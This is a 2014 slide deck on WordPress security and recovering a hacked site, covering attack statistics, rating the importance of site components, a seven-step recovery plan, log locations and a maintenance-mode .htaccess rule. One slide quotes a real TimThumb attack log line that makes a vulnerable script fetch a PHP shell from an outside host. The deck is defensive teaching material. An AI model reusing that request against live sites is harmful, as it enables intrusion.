ARE YOU READY TO BE

HACKED?Daniel Kanchev @dvkanchev

May 17th, 2014

WHO AM I?

• 7+ Years of WordPress experience • 5 Years with SiteGround • Love FOSS • Security Freak • Addicted to extreme sports

Daniel Kanchev

IN THIS SESSION

• Why Should YOU Care

• Assets Evaluation

• Getting Help

• A KISS Disaster Recovery Plan

• Conclusion

WHY MEEEEEEEE ???

IN 2013, 61 % OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY.

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF OVER 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT.

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012!

+ 700 %Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

ATTAKS PER DAY

2010 2012 2013

570,000

464,000

190,000

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

ASSETS EVALUATION

MODULAR DESIGN

• Divide your site in logical components

• Allocate weight to all components

• Sort components based on criticality

EXAMPLE TABLE

Component Weight

WooCommerce plugin 4

Custom theme 3

Gallery plugin 2

Contact form 1

GETTING HELP

IDENTIFY WHO CAN HELP YOU

• The support team of your web host

• Plugin and theme developers

• Third party companies

• Security specialists

THE SUPPORT TEAM OF YOUR WEB HOST

• Website diagnostics

• Website backups and restores

• Log analysis

• WordPress core/plugin/theme upgrades

• Regular Security Audits

• Malware notifications and malicious code cleaning

PLUGIN AND THEME DEVELOPERS/SUPPORT

• New plugin/theme versions

• Security updates

• Migration to new versions of your themes/plugins

DISASTER RECOVERY PLAN

7 ”EASY” STEPS1. DON’T PANIC!

2. Create a copy of the hacked site + all logs

3. Quarantine your site

4. Remove the malicious code

5. Check the archived logs for the source of the attack

6. Resolve the security issues that caused the problem

7. “Unquarantine” your site

1. BACKUP YOUR HACKED SITE

1. mysqldump -uU -pP DB > yoursitefolder/DB.sql 2. tar zcvf backup.tar.gz yoursitefolder

How to backup:

Why to do this:

This is needed, so that you can later find outthe source of the attack/vulnerability!

USEFUL LOGS(on a cPanel server)

• /var/log/messages - FTP log for PureFTPd • /usr/local/apache/domlogs/DOMAIN.COM -

Apache access log • /var/log/exim_mainlog - Exim mail server

log • /usr/local/cpanel/logs/access_log - cPanel

File Manager log • /var/log/secure - SSH connections log

2. QUARANTINE YOUR SITE + CHANGE PASSWORDS

1. Protect your users and visitors 2. Disallow Google to access your hacked

site 3. Keep hackers away during the cleaning of

the site

USE .HTACESS MAGIC<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{REMOTE_ADDR} !^123\.56\.89\.12 RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f RewriteCond %{SCRIPT_FILENAME} !maintenance.html RewriteRule ^.*$ /maintenance.html [R=503,L] ErrorDocument 503 /maintenance.html Header Set RetryAfter "14400" Header Set CacheControl "maxage=0, nostore" </IfModule>

3. REMOVE THE MALICIOUS CODE

1. Restore the site from a clean backup

OR

2. Clean the affected files/database tables

4. ARCHIVED LOGS ANALYSIS

• Is complicated • Is time consuming • Requires advanced HTTP knowledge • Should be performed by security specialists

EXAMPLE - THE TIMTHUMB HACK

189.100.29.167 - [12/Apr/2014:06:53:41 +1000] “GET /wpcontent/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.ex l.ro/max/wp-mails.php HTTP/1.1ʹ′ʹ′ 301 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]”

189.100.29.167 - IP of the attacker. premiumtheme/timthumb.php - Vulnerable script. wp-mails.php - PHP shell script.

5. RESOLVE THE SECURITY ISSUES

• Upgrade WP core, plugins and themes • Upgrade server software if needed • Patch your code and use WAF in case there

are no upgrades available

6. UNQUARANTINE YOUR SITE + CHANGE PASSWORDS

• Remove the maintenance page • Inform users about the breach if needed • Keep an eye on your files/DB

CONCLUSION

• Web security is complicated! • Rely on partners to recover your site. • Be ready to manage the whole process. • Know your assets. • Make sure you have good security awareness. • Security is a journey - NOT a destination!

THANK YOU